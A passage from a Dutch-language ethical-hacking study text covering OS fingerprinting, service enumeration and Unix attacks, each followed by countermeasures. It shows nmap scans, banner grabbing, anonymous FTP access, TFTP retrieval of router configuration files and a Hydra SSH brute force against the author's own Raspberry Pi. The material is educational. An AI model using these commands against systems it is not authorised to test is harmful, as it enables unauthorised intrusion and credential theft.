6.6 Poort scans Tegenmaatregels Een poortscan is een belangrijke scan voor een hacker, om het systeem dat hij wil aanvallen
te identificeren. Voor een verdediger is het moeilijk om zo een poortscan tegen te houden. Er zijn sommige technieken die je kan gebruiken om een soortgelijke poortscan tegen te houden.
6.6.1 Snort IDS Dit is een goede applicatie om poortscans op te sporen en te rapporteren. Dit programma heeft niet de mogelijkheid om een poortscan tegen te houden, wel om te rapporten wanneer er een plaatsvindt of plaatsgevonden heeft.
6.6.2 Treshold logging Treshold loggin is een methode die je kan gebruiken om je log eerst te groeperen voor hem door te zenden naar uw e-mail adres of computer. Je zou dit kunnen doen om een goed overzicht te houden van de situatie. Het is niet de bedoeling dat je bij een aanval voor elk pakket een e-mail krijgt. Want dan zou je mailbox overspoeld worden met e-mails en dan heb je geen overzicht meer van de situatie.
6.6.3 Onnodige services afzetten Iets wat je zeker zou moeten doen is al je onnodige services afzetten waardoor de overeenkomstige poorten gesloten zullen worden. Je kan dit, zowel in UNIX als in Windows doen.
• UNIX: in het bestand /etc/inetd.conf voor al de onnodige services een “#” plaatsen • Windows: Control panel en hierna Services kiezen
6.6.4 Voorzichtig te werk gaan met tegenmaatregels Als je een poortscan tegenhoudt door het IP-adres te blokkeren van de persoon die de poortscan uitvoert kan het zijn dat je een medewerker blokkeert die er niets mee te maken heeft. Het kan zijn dat de aanvaller zijn IP-adres veranderd heeft in een IP-adres van een medewerker, om zo zijn identiteit te verdoezelen.
59
© Nathan Boone
7 Raden naar het besturingssysteem Op dit moment weten we welke toestellen actief zijn op het netwerk en op welke services op deze toestellen actief zijn. Hierdoor weet je dus ook welke poorten openstaan. Het volgende dat we moeten doen is achterhalen welk besturingssysteem aanwezig is op de doelcomputer. Dit kan je op verschillende manieren doen:
Met de poorten te analyseren kan je een gok doen maar zeker niet met zekerheid zeggen welk besturingssysteem op de doelcomputer geïnstalleerd staat.
• Poorten analyseren o Windows: poorten 135, 139 en 445 o UNIX: poorten 22, 111, 512-514, 2049 en > 3277
Je kan ook aan stack fingerprinting doen, dit is veel betrouwbaarder maar duurt wel langer.
• Fingerprinting o Active stack fingerprinting: hiermee zal je actief pakketten naar de doelcomputer
sturen. Dit kan gelogd worden door het systeem waardoor je buitengesloten kan worden.
o Passive stack fingerprinting: hiermee zal je in het netwerk luisteren naar de pakketten die voorbijgaan. Hieruit kan je afleiden waar welk toestel staat zonder dat iemand hier iets van te weten komt.
7.1 Active Stack Fingerprinting Active Stack fingerprinting is een manier om te achterhalen welk besturingssysteem actief is op de doelcomputer. Je stuurt verschillende pakketten naar de doelcomputer en afhankelijk van zijn reactie, kan je afleiden welk besturingssysteem gebruikt wordt.
Commando met Nmap: nmap –O 192.168.1.1
Resultaat:
root@bt:~# nmap -O 192.168.1.20 Starting Nmap 6.25 ( http://nmap.org ) at 2013-12-24 14:36 CET Nmap scan report for 192.168.1.20 Host is up (0.0062s latency). Not shown: 995 filtered ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 2869/tcp open icslap 49159/tcp open unknown MAC Address: 4C:0F:6E:2C:C5:F6 (Hon Hai Precision Ind. Co.) Device type: general purpose|phone Running: Microsoft Windows 7|Vista|2008|Phone OS CPE: cpe:/o:microsoft:windows_7::-:professional cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows OS details: Microsoft Windows 7 Professional, Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7, Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008, Microsoft Windows Phone 7.5 Network Distance: 1 hop
60
© Nathan Boone
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 7.90 seconds Nmap heeft in de achtergrond de IP stack van de computer die ik laten analyseren heb, geanalyseerd volgens onderstaande eigenschappen. Om dit te kunnen doen, heeft Nmap wel minstens 1 open poort nodig:
• FIN probe • Bogus flag probe • Initial Sequence Number (ISN) sampling • “Don’t fragment bit” monitoring • TCP initial window size • ACK value • ICMP error message quenching • ICMP message quoting • ICMP error message – echoing integrity • Type of service (TOS) • Fragment handling • TCP options
Als Nmap geen open poorten vindt, zal hij raden naar het besturingssysteem en zelfs dan kan Nmap juist raden naar het besturingssysteem.
Op de computer die ik laten scannen heb, is het besturingssysteem Microsoft Windows 7 home Premium geïnstalleerd. Als we de scan analyseren komen we tot het besluit dat de scan gelukt is en uit de scan is gebleken dat er Microsoft Windows 7 op de computer geïnstalleerd staat.
7.2 Passive Stack Fingerprinting Passive stack fingerprinting is een manier om te weten te komen welk besturingssysteem op de doelcomputer geïnstalleerd staat. Je zal in het netwerk luisteren naar de pakketten die voorbijgaan. Bij deze manier is het wel noodzakelijk om op een centrale plek op het netwerk te zijn.
Je zal pakketten analyseren en kijken naar de volgende zaken:
• TTL: wat is de grootte van de time-to-live. • Window size: wat is de window size? • DF: is er een “Don’t fragment bit?”
7.3 Raden naar het besturingssysteem Tegenmaatregels Om tegen te gaan dat Nmap of andere tools je besturingssysteem kunnen vinden, kan je de
dezelfde tools gebruiken als besproken zijn om poortscans tegen te houden, zoals Snort.
Wat je ook kan doen is de broncode van je besturingssysteem wijzigen, zodat je besturingssysteem op verschillende pakketten anders reageert. Dit is heel moeilijk om uit te voeren en is alleen maar mogelijk als je er echt in gespecialiseerd bent. Het is immers geen ramp als een hacker je besturingssysteem te weten komt. Er zijn nog vele andere zaken waarmee je je kan beschermen tegen aanvallen.
61
© Nathan Boone
8 Processing and storing scan data Als je een groot netwerk hebt en je doet op dat netwerk verschillende scans, dan wordt het onoverzichtelijk om daar de juiste conclusies uit te trekken. Het is daarom nuttig om de gegevens die je van de scans behaald hebt in een databank te zetten. Van hieruit heb je een overzichtelijk beeld van de scan data. Je kan dit doen door het Metasploit framework te gebruiken.
62
© Nathan Boone
Stap 3: Ennumeratie 1 Inleiding In stap twee Scanning zijn we op zoek gegaan naar welke services op welke hosts aanwezig zijn. In deze stap gaan we hier nog verder op in. We zullen bij Enumeratie overgaan tot het identificeren van de service en het besturingssysteem. We kunnen hierbij ook te weten komen welke versie hiervan geïnstalleerd is. Om dit te kunnen doen, zullen we connecties moeten opstellen naar de systemen. Deze connecties kunnen of zullen gelogd worden door het systeem dat je wil aanvallen, waardoor er een mogelijkheid bestaat dat je uitgesloten word van het netwerk. Veel van de informatie die je via deze manier buitmaakt lijkt op het eerste zicht ongevaarlijk, maar met die informatie kan je veel doen achteraf. Dit wordt nog verder besproken in de volgende stappen, Hacking Unix en Remote Connectivity.
De services die zullen besproken worden zijn:
• FTP: TCP poort 21 • Telnet: TCP poort 23 • TFTP: TCP/UDP poort 69 • IPSec/IKE: UDP poort 500
2 Nmap version scanning Voor we kunnen beginnen met de services te inventariseren, zullen we eerst een scan moeten uitvoeren om te weten welke services actief zijn achter welke poorten. Dit soort scan is uitgebreid uitgelegd in Stap 2: scanning. We zullen eerst een poortscan uitvoeren en dan zullen we een versie-scan uitvoeren. Een poortscan zal naast de poorten informatie plaatsen van wat Nmap denkt over de service die achter de betreffende poort zit. Deze informatie haalt Nmap uit een tabel met naast elke poort een standaard service. Met een versiescan zal Nmap actief verschillende zaken uitvoeren om zo te weten te komen welke service achter welke poort zit.
Zoals je hieronder kan zien weet de TCP SYN scan bij sommige poorten niet over welke service het gaat, de versiescan weet wel over welke soort poorten het gaat.
63
© Nathan Boone
2.1 TCP SYN poortscan Commando:
root@bt:~# nmap -sS 192.168.1.5
Resultaat:
Starting Nmap 6.25 ( http://nmap.org ) at 2014-01-02 20:40 CET Nmap scan report for 192.168.1.5 Host is up (0.0040s latency). Not shown: 994 closed ports PORT STATE SERVICE 80/tcp open http 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 515/tcp open printer 2121/tcp open ccproxy-ftp MAC Address: 00:1C:F0:1B:28:BB (D-Link) Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds Bij dit soort poortscan kan je zien dat er naast de poorten een service staat. De naam van de service wordt uit het bestand nmap-services gehaald. Dit is een simpel tekstbestand waar de overeenkomstige namen uitgehaald worden. Nmap kan dus wel eens verkeerd zijn met deze benamingen.
2.2 TCP versiescan Commando:
root@bt:~# nmap -sV 192.168.1.5 –p 2121
Resultaat:
Starting Nmap 6.25 ( http://nmap.org ) at 2014-01-02 20:40 CET Nmap scan report for 192.168.1.5 Host is up (0.0051s latency). PORT STATE SERVICE VERSION 2121/tcp open ftp Pure-FTPd MAC Address: 00:1C:F0:1B:28:BB (D-Link) Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 0.45 seconds Bij dit soort scan, een TCP versiescan zal Nmap veel verder gaan dan alleen in een bestand te zoeken naar de overeenkomstige benamingen.
Een versiescan zal de volgende zaken doen:
• maakt connectie met de poort • vragen naar feedback • vergelijkt wat hij terugkrijgt met gekende protocollen • deze informatie haalt hij uit het bestand nmap-service-probe
In dit voorbeeld heeft hij eerst poort 2121 aangeschreven als een FTP-proxy. Daarna met de versiescan is hij tot het besluit gekomen dat dit gaat om een FTP server met een versie van Pure-FTPd
64
© Nathan Boone
3 Basic Banner Grabbing Door Banner Grabbing toe te passen kan je veel te weten komen over het systeem dat je wilt aanvallen. Bij Banner Grabbing zal je connecteren met de poort waar je meer over te weten wilt komen. Je zal dan de output analyseren en hieruit kan je veel afleiden.
Je kan verschillende commando’s gebruiken om aan Banner Grabbing te doen, in dit voorbeeld zal het commando Telnet gebruikt worden.
3.1 Banner Grabbing met Telnet Commando:
root@bt:~# telnet 192.168.1.1 80
Resultaat:
HTTP/1.0 400 Bad Request Content-Type: text/html Cache-Control: no-cache Pragma: no-cache Expires: Thu, 02 Jan 2014 20:30:08 GMT Date: Thu, 02 Jan 2014 20:00:08 GMT Accept-Ranges: bytes Connection: close <html> <head> <title>400 Bad Request</title> </head> <body bgcolor="ffffff"> <h2>400 Bad Request<h2> <p> </body> </html> Connection to host lost.
Uit het vorige kunnen we afleiden dat er op 192.168.1.1 een webserver aanwezig is op poort 80. Mocht er zich achter poort 80 niets bevinden, dan zouden we het volgende resultaat krijgen:
Commando:
root@bt:~# telnet 192.168.1.3 80
Resultaat:
Connecting To 192.168.1.3...Could not open connection to the host, on port 80: Connect failed
65
© Nathan Boone
3.2 Banner Grabbing Tegenmaatregels Je kan als netwerk administrator ook beslissen om maar een bepaald aantal hosts toegang te
geven tot die bepaalde poort/service. Zo kan je bijvoorbeeld enkel van de computer van de administrator een Telnet sessie aanmaken naar de router. Je kan dit doen door netwerk acces control toe te passen.
De beste beveiliging tegen Banner Grabbing is de poorten die niet nodig zijn uit te schakelen.
Je kan ook de informatie laten aanpassen die te zien is via Banner Grabbing. Op die manier kan er nauwelijks aan Banner Grabbing gedaan worden.
4 Enumerating veel voorkomende services In dit hoofdstuk zullen we veel voorkomende services inventariseren. De services die zullen besproken worden zijn:
• FTP: TCP poort 21 • Telnet: TCP poort 23 • TFTP: TCP/UDP poort 69 • IPSec/IKE: UDP poort 500
4.1 FTP Enumeration, TCP 21 FTP is een protocol dat steeds minder gebruikt wordt omdat het onveilig is, maar omdat het zo gemakkelijk is toe te passen wordt het nog steeds gebruikt.
Als je een website laat hosten via Belgacom of een andere ISP, kan je je website beheren via FTP. Je zal dan een login krijgen tot je eigen persoonlijke ruimte op die FTP-server. Je kan dan HTML-pagina’s op die FTP-server plaatsen. Hierdoor zal je HTML-pagina, dus website, te zien zijn op het internet.
4.1.1 FTP anonymous access Er zijn FTP-servers die toelaten om anoniem met hun te verbinden. Hierdoor heb je geen controle over wie wel en niet mag connecteren met je FTP-server.
Om de volgende test uit te voeren heb ik eerst gezocht naar anonieme FTP servers op de site http://www.ftp-sites.org/.
Commando:
root@bt:~# ftp ftp.c-logic.be, anonymous, ls
Resultaat:
Connected to srvftp.c-logic.be. 220 Microsoft FTP Service User (srvftp.c-logic.be:(none)): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 Anonymous user logged in. ftp> ls 200 PORT command successful. 150 Opening ASCII mode data connection for file list. ASP Formulieren INGEKORT 226 Transfer complete. ftp: 102 bytes received in 0.01Seconds 14.57Kbytes/sec.
66
© Nathan Boone
Uit het vorige kunnen we afleiden dat de server waar de FTP service op draait, een Microsoft server is.
FTP is onveilig omdat het al de gegevens verstuurd in gewone tekst dus niet geëncrypteerd. Als er iemand je verbinding afluistert, kan die persoon te weten komen wat je wachtwoord is en welke bestanden je via FTP verplaatst.
4.1.2 FTP Tegenmaatregels FTP is een service die je beter niet meer gebruikt. Het is een oude service die ontstaan is als
het internet nog niet zo een gevaarlijke wereld was.
Als je toch gegevens publiek wilt maken doe je dit beter via HTTP en dit om de simpele manier dat je via HTTP minder gemakkelijk kan te maken hebben met mensen die geïnfecteerde of illegale bestanden uploaden op je server. Zelf als je FTP zou willen gebruiken is het nog altijd aangeraden om elke manier van uploaden tegen te houden.
Als je toch FTP wilt gebruiken is het aangeraden om Secure FTP (SFTP) te gebruiken. Dit is een protocol dat werkt zoals FTP, maar dit protocol zal al de bestanden en tekst die heen en weer gaat encrypteren met SSH encryptie.
Je kan ook FTP Secure gebruiken. Die zal hetzelfde doen als SFTP, maar deze zal SSL encryptie gebruiken.
4.2 Telnet Enumeratie, TCP 23 Telnet is een service die veel gebruikt wordt omdat dit het eerste protocol was die remote access toeliet. Het slechte aan Telnet is dat het al zijn gegevens in gewone tekst zal doorsturen, waardoor niets geëncrypteerd is, zelf de gebruikersnaam en het wachtwoord niet. Een veel gebruikt alternatief is Secure Shell (SSH). SSH zal wel encryptie gebruiken voor de gegevens.
4.2.1 System Enumeratie via Telnet Banners Telnet zal meestal een banner laten zien voor je in te loggen via Telnet. Bij een Cisco toestel is dit één van de volgende:
Commando:
root@bt:~# telnet 192.168.1.1
Resultaat:
User Access Verification. Password: Ofwel
User Access Verification. Username: Bij de laatste banner kan je ervan uitgaan dat er een vorm van authentication, authorization en accounting (AAA) aanwezig is. Dit wordt meestal toegepast door het TACACS+ of Radius.
Zoals je kan zien, kan je door dit simpel commando veel te weten komen over de betreffende Telnet server en het netwerk waar hij op aangesloten is.
67
© Nathan Boone
4.2.2 User Enumeratie via Telnet Je kan nagaan of je een correcte gebruikersnaam of wachtwoord ingevoegd hebt naargelang de foutmelding die je terugkrijgt van het betreffende systeem.
4.2.3 Telnet Enumeratie Tegenmaatregels Eerst en vooral zou je Telnet niet meer mogen gebruiken, omdat je alles kan afluisteren wat
er ingevoerd wordt. Je zou het alternatief SSH moeten gebruiken.
Als je toch Telnet wilt gebruiken, is er een mogelijkheid om je banner te veranderen zodat het moeilijker wordt om aan systeem- of gebruiker-enumeratie te doen.
Het is ook aangeraden om gebruikers opnieuw te laten connecteren als er een foute aanmelding gebeurt.
4.3 TFTP Enumeratie, TCP/UDP 69 TFTP is een service die veel gebruikt wordt om “images” in te laden in toestellen. Onder andere Cisco gebruikt dit protocol om zijn IOS te upgraden. Bij TFTP zal je de bestandnaam en de plaats waar het bestand staat, moeten invoeren voor je het bestand kan downloaden. Dit is zowel veilig als onveilig. Het is veiliger dan FTP, want je krijgt geen overzicht van al de verschillende bestandsnamen en directories. Maar het is ook onveilig, omdat er bestanden zijn die op een standaard plaats in een besturingssysteem opgeslagen zijn. In een UNIX systeem zijn er bestanden waar al de gebruikersnamen en bijhorende gegevens opgeslagen staan. Dit is het bestand: /etc/passwd.
4.3.1 Bestanden kopiëren met een Linux TFTP Server In het volgend voorbeeld wordt er uitgelegd hoe je een bestand kan kopiëren via TFTP naar een ander systeem.
De volgende tool kan hiervoor gedownload worden:
• TFTPD32 (http://tftpd32.jounin.net/tftpd32_download.html)
Commando’s:
root@bt:~# tftp 192.168.1.8 tftp> connect 192.168.1.8 tftp> get TFTPTest.txt TFTPTest.txt Received 30 bytes in 0.7 seconds tftp> quit Resultaat:
root@bt:~# cat TFTPTest.txt TFTP transfer is succesvol.
4.3.2 Accessing Router/Switch Configurations via TFTP Als je een poortscan uitvoert op een router of switch en je ziet dat poort 69 openstaat dan kan je een TFTP overdracht uitproberen. Op deze manier kan je gevoelige informatie te weten komen over de configuratie van de router of switch. Enkele bestanden die gevoelige gegevens bevatten zijn:
running-config startup-config .config config run
68
© Nathan Boone
4.3.3 TFTP Enumeratie Tegenmaatregels TFTP is een onveilig protocol die je best niet gebruikt. Als je dit protocol toch moet gebruiken
dan zorg je er het beste voor dat de bestanden waar je toegang toe hebt, beperkt zijn. En je zorgt er ook het beste voor dat het TFTP protocol tegen gehouden wordt aan de rand van je netwerk. Hierdoor kunnen hackers van buiten je interne netwerk niet aan je TFTP server van binnenin je netwerk.
4.4 IPSec/IKE, UDP 500 Het is zeer moeilijk om een firewall te kraken zodat deze u doorlaat. De meeste aanvallen gebeuren van binnenin de onderneming. Als je niet fysiek in de onderneming kan zijn, dan kan je ook nog gebruik maken van een Virtual Private Network (VPN) die opgesteld is voor de mensen die veilig van op afstand willen werken. Dit is eigenlijk een tunnel die opgesteld wordt van de computer van de medewerker tot het netwerk van het bedrijf. Als je in deze tunnel binnenbreekt, ben je dus binnen in het netwerk. Dit is niet zo simpel. Want IPSec en IKE gebruiken veel methodes om het een hacker moeilijk te maken om in die tunnel binnen te breken. Er worden vele verschillende soorten encryptie gebruikt.
4.4.1 Probing IPSec tunnel Om te kunnen binnenbreken in een tunnel, moet je eerst te weten komen welke zaken de IPSec tunnel gebruikt om een tunnel op te stellen.
Je kan de aanwezigheid van een tunnel niet zomaar te weten komen met een poortscan, omdat een VPN meestal de pakketten zal laten vallen die niet aan een bepaald formaat voldoen.
De volgende tool kan hiervoor gedownload worden: ike-scan van NTA Monitor (www.nta-monitor.com/tools/ike-scan)
Commando:
root@bt:~# ike-scan 192.168.1.1
Resultaat:
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/) 192.168.1.1 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=0e803d2b90649737) Ending ike-scan 1.9: 1 hosts scanned in 0.014 seconds (72.26 hosts/sec). 0 returned handshake; 1 returned notify
4.4.2 IPSec/IKE Enumeratie Tegenmaatregels Om een ike-scan tegen te houden, kan je instellen dat er alleen maar naar deze poort mag
gevraagd worden vanaf specifieke IP-adressen. Dit kan je wel alleen maar doen met een Site-to-Site VPN waar het IP-adres onveranderd blijft.
Het vorige is zeer moeilijk uit te voeren als je ook de mogelijkheid wil geven om een VPN op te stellen van op een publiek netwerk waar het IP-adres dynamisch verkregen is, via DHCP. In dit geval is het aangeraden om met een sterk wachtwoord of certificaten te werken.
69
© Nathan Boone
Pagina opzettelijk blanco gelaten
70
© Nathan Boone
Stap 4: Hacking Unix 1 Inleiding In de vorige stappen was het, het doel om het netwerk in kaart te brengen en informatie te krijgen over de verschillende aanwezige systemen en protocollen en waar deze aanwezig zijn in het netwerk. In deze stap zullen we proberen binnen te breken in die specifieke services. Het doel van deze stap zullen doen is toegang te krijgen tot de systemen en waar het kan “root access” proberen te verkrijgen op de systemen.
Deze stap heet “Hacking Unix”. Er bestaat ook een stap “Hacking Windows” maar omdat de meeste servers bestaan uit Unix-servers hebben we geopteerd om enkel “Hacking Unix” te bespreken.
2 Brute-force Aanval Een Brute-force aanval is één van de oudste aanvalsvormen die er bestaat. Deze aanvalsvorm bestaat uit het raden naar wachtwoorden en gebruikersnamen. Dit kan niet bij elke service. De meest gebruikte services die dit soort van aanval toelaten, als je ze niet goed beveiligd, zijn:
• Telnet • File Transfer Protocol (FTP) • De “r” commands (RLOGIN, RSH, enz.) • Secure Shell (SSH) • Simple Network Management Protocol (SNMP) community namen • Lightweight Directory Access Protocol (LDAPv2 en LDAPv3) • Post Office Protocol (POP) • Internet Message Access Protocol (IMAP) • Hypertext Transport Protocol (HTTP) • Hypertext Transport Protocol Secure (HTTPS) • Concurrent Version System (CVS) • Subversion (SVN) • Postgres • MySQL • Oracle
2.1 Brute-force aanval toepassen Om een brute-force aanval toe te passen kan je eerst een “Finger-“, “Rusers-” of “Sendmail-”aanval plegen om gebruikersnamen te bemachtigen. Je kan dan deze gebruikersnamen gebruiken om je aanval mee uit te voeren. Het is mogelijk om een brute-force aanval manueel uit te voeren, al wordt dit meestal overgelaten aan tools die hiervoor gemaakt zijn.
De volgende brute-force aanval vindt plaats in een thuisomgeving en het toestel dat betrokken is bij deze aanval is eigen eigendom.
Het toestel dat aangevallen wordt is een Raspberry Pi. Om deze aanval in te leiden heb ik al de default gebruikersnamen en wachtwoorden opgezocht, ik heb deze in de documenten gebruikersnaam.txt en wachtwoord.txt geplaatst. De tool, Hydra is gebruikt omdat deze de meest populaire tool is op het vlak van brute-force aanvallen. Figuur 2-1 Raspberry Pi
71
© Nathan Boone
Commando:
root@bt:~# hydra -L gebruikersnaam.txt -P wachtwoord.txt 192.168.1.6 ssh Resultaat:
Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only Hydra (http://www.thc.org/thc-hydra) starting at 2014-01-04 17:57:34 [DATA] 16 tasks, 1 server, 25 login tries (l:5/p:5), ~1 try per task [DATA] attacking service ssh on port 22 [STATUS] attack finished for 192.168.1.6 (waiting for children to finish) [22][ssh] host: 192.168.1.6 login: pi password: raspberry 1 of 1 target successfuly completed, 1 valid password found Hydra (http://www.thc.org/thc-hydra) finished at 2014-01-04 17:57:51 Uit het voorbeeld kunnen we de volgende zaken afleiden:
• Er zijn 5 wachtwoorden en 5 gebruikersnamen opgegeven, wat zorgt voor 25 mogelijkheden. • De service SSH op poort 22 zal worden aangevallen. • De gebruikersnaam en het wachtwoord zijn geraden, gebruikersnaam: pi wachtwoord:
raspberry.
2.2 Brute-Force aanval Tegenmaatregels De beste verdediging tegen een brute-force aanval is ervoor zorgen dat je sterke
wachtwoorden bedenkt, of een programma die wachtwoorden laat genereren. Je mag zeker niet de default ingestelde wachtwoorden en gebruikersnamen laten staan. Als je in een bedrijf beslist over welke wachtwoorden de gebruikers mogen kiezen kan je enkele voorwaarden opleggen.
Enkele goede voorwaarden zijn:
• minimum passwoord lengte • maximum aantal weken dat je hetzelfde wachtwoord kan behouden • niet toelaten om twee keer hetzelfde wachtwoord te gebruiken • minimum aantal karakters uit het alfabet • minimum aantal nummers • minimum aantal speciale karakters • minimum aantal kleine letters • minimum aantal hoofdletters
Naast aan je gebruikers goede wachtwoorden te laten kiezen kan je nog enkele andere zaken implementeren in je systeem, zodat een brute-force aanval veel langer zal duren of zelf niet zal lukken:
• elke keer als er een verkeerde login plaatsvindt, de verbinding verbreken • elke keer als er een verkeerde login plaats vindt, pas na 20 seconden opnieuw laten proberen • services uitzetten die niet gebruikt worden • ervoor zorgen dat geen enkel wachtwoord twee keer voorkomt in het netwerk • default wachtwoorden veranderen
72
© Nathan Boone
3 File Transfer Protocol File transfer protocol (FTP) is een protocol dat gebruikt wordt om bestanden op en van een server te halen. De server waar deze bestanden opstaan wordt een FTP server genoemd, de service wordt FTP genoemd en is te vinden op poort 21.
Hackers zullen deze service misbruiken door illegale bestanden op te slaan bij mensen die een FTP server hebben en die er niet van bewust zijn dat deze bestanden op hun FTP server aanwezig zijn.
Vele FTP servers laten anonieme toegang toe. Dit wil zeggen dat de gebruikers zonder authenticatie op de FTP server mogen.
Meestal wordt er op een FTP server slechts een gedeelte van de hele FTP server opengezet, bijvoorbeeld alleen een bepaalde map. Op een FTP server die anonieme toegang toelaat, worden echter al de bestanden en mappen opengesteld waardoor de aanvallers gevoelige gegevens kunnen downloaden. Zoals het bestand in /etc/passwd.
Sommige FTP servers hebben boven deze anonieme toegang dan ook nog eens “world writable directories”. Dit betekent dat al de gebruikers die toegelaten zijn tot het systeem bestanden kunnen schrijven op de FTP server.
Als een server de anonieme toegang en de “world writable directory” toelaat dan vraag je eigenlijk naar moeilijkheden. Het is zo goed als zeker dat er iemand zal proberen illegale bestanden op je FTP server te plaatsen. Dit zal gebeuren omdat het zo gemakkelijk is om toegang te krijgen tot de FTP-server.
3.1 FTP-server aanvallen Zoals eerder al besproken is het bij UNIX het doel om root access te behalen op het systeem. Er bestaat een exploit die een “shell” zal creëren op een lokale poort, die gekozen kan worden door de aanvaller. Hierdoor krijgt de hacker root access op het systeem.
Dit is een exploit gevonden door King Cope op de FreeBSD FTPD en ProFTPD systemen. Als je geïnteresseerd bent over de werking van deze aanval, kan je het boek Hacking Exposed 7 raadplegen op pagina 260.
3.2 FTP aanval Tegenmaatregels FTP is een zeer nuttig protocol dat nog zeer veel gebruikt wordt. Als je FTP gebruikt is het
belangrijk dat je nagaat of anonieme toegang nodig is op je systeem. Als dit niet nodig is, gebruik je dit beter ook niet. Het is altijd beter als je de gasten een account laat aanmaken. Op deze manier kan ja de handelingen van die accounts nagaan.
Ook is het belangrijk om de hoeveelheid “world writable directories” te beperken tot het minimum.
Ten laatste is het aan te raden om de laatste patches toe te passen om zo de exploits aan het systeem in te korten.
bron: http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites#Looking_world-writable_directories
73
© Nathan Boone
4 Secure Shell 4.1 SSH Secure shell (SSH) is een protocol dat zeer veel gebruikt wordt voor remote access. Het is een protocol dat ontstaan is voor de veiligheid. SSH zal al zijn gegevens die over het netwerk gaan, encrypteren en SSH zal ook zorgen voor goede authenticatie van de gebruikers.
Er is bij dit protocol ook een mogelijkheid om root-access te behalen. Dit kan je doen op servers van volgende types:
• OpenSSH service van ouder dan 2.3.0 • SSH-1.2.24 tot SSH-1.2.31 versie
4.2 SSH Tegenmaatregels Het is belangrijk dat je de SSH service die op je cliënt en server staat blijft updaten tot de
laatste nieuwe versie. Voor meer informatie over SSH best practices: http://www.cyberciti.biz/tips/linux-unix-bsd-openssh-server-best-practices.html
5 Sniffers 5.1 Wat is een sniffer? Sniffers zijn veelgebruikte programma’s door aanvallers en netwerk administrators. Ze geven de mogelijkheid om het netwerkverkeer af te luisteren en al de pakketten te laten zien die over het netwerk verstuurd worden, van en naar de computer waar de sniffer opstaat.
5.2 Aanvaller Wat een aanvaller zal doen is root access proberen te krijgen in een systeem. Op een systeem dat op het netwerk staat zal hij een sniffer plaatsen. Hierdoor zal hij de mogelijkheid hebben om al het netwerkverkeer af te luisteren en wachtwoorden, gebruikersnamen en documenten buit te maken.
5.3 Administrator Een netwerkadministrator zal een sniffer gebruiken om meer te weten te komen over zijn eigen netwerk. Als hij iets geïmplementeerd heeft en het werkt niet meteen, zal hij een sniffer gebruiken om te achterhalen wat er gebeurt met de pakketten die verstuurd worden op het netwerk.
5.4 Hoe werkt een sniffer? Een ethernet sniffer werkt samen met de Network Interface Card (NIC). Een NIC zal normaal alleen maar al het verkeer dat voor hem bestemd is ontvangen. Een sniffer zal hier verandering in brengen. Eerste zal een sniffer de NIC in staat stellen om al het verkeer af te luisteren dat voorbijkomt, ook al het verkeer dat niet voor hem bestemd is. Dit wil zeggen dat de sniffer de NIC in “promicious mode” zal plaatsen. Op dit moment kan je de sniffer aanzetten en zal deze al het verkeer analyseren en op je scherm laten zien.
Een sniffer wordt meestal gebruikt op een plaats in het netwerk waar veel verkeer is, of waar kritieke zaken gedaan worden op het netwerk. Bijvoorbeeld op de computer van de administrator, of op de router die in verbinding staat met het internet.
5.5 Voorbeeld van een sniffer Een sniffer die veel gebruikt wordt op Windows en op UNIX computers is Wireshark.
Wireshark kan gedownload worden van http://www.wireshark.org/download.html.
74
© Nathan Boone
De volgende afbeelding illustreert de start van de sniffer Wireshark. Op dit scherm moet je de interface kiezen waarop je wil afluisteren en dan op start klikken.
Figuur 5-1 Wireshark startscherm
Op de volgende figuur kan je zien dat Wireshark bezig is het netwerk te sniffen. Hij zal het netwerk dus afluisteren en de pakketten analyseren. Op de volgende figuur is er ook een filter geplaatst dit enkel de ICMP berichten laat zien.
Figuur 5-2 Wireshark Filter ICMP
75
© Nathan Boone
5.6 Populaire sniffers In de volgende tabel zullen de populairste sniffers uitgelegd worden met elk hun downloadpagina en beschrijving.
Naam Download locatie Beschrijving Tcpdump http://sourceforge.net/projects/tcpdump Klassieke pakket sniffer die
beschikbaar is op vele besturingssystemen.
Snoop Zit ingebouwd in het besturingssysteem Solaris. Solaris is te downloaden via https://solaris.java.net.
Een pakket sniffer die ingebouwd zit in het besturingssysteem Solaris.
Dsniff http://monkey.org/~dugsong/dsniff Één van de sniffers die het meeste mogelijkheden heeft.
Ettercap http://ettercap.github.io/ettercap Een sniffer met de mogelijkheid om arp-poisoning te doen.
Wireshark http://www.wireshark.org/download.html Een freeware sniffer met veel protocol decoders.
Tabel 5-6 Populaire sniffers
5.7 Sniffers Tegenmaatregel Er zijn drie verschillende manieren om sniffers tegen te houden:
• migreren naar een switched netwerk topologie • sniffers detecteren • encryptie toepassen, SSH of IPSec
5.7.1 Migreren naar een switched netwerk topologie In een niet switched netwerk topologie wordt er gebruik gemaakt van een hub waardoor al het verkeer zal gebroadcast worden naar al de hosts. Op deze manier zal het mogelijk zijn om al het verkeer af te luisteren op één enkele plek op het netwerk. Het is dus noodzakelijk om de broadcasts te beperken. Dit kan je doen door de hubs te veranderen in switches en waar het nodig en mogelijk is, een VLAN aan te maken. Dit komt de performantie van het netwerk ten goede.
5.7.2 Sniffers detecteren Je kan sniffers detecteren op verschillende manieren.
Bij host-based detectie kan je verschillende zaken ondernemen om na te gaan of er een sniffer aanwezig is op de computer:
• nakijken of de NIC in promicious mode staat • nakijken of er een sniffer bij de processen zit • nakijken of er een sniffer bij het taakbeheer zit • zoeken naar grote logbestanden, want een sniffer maakt vaak grote logbestanden
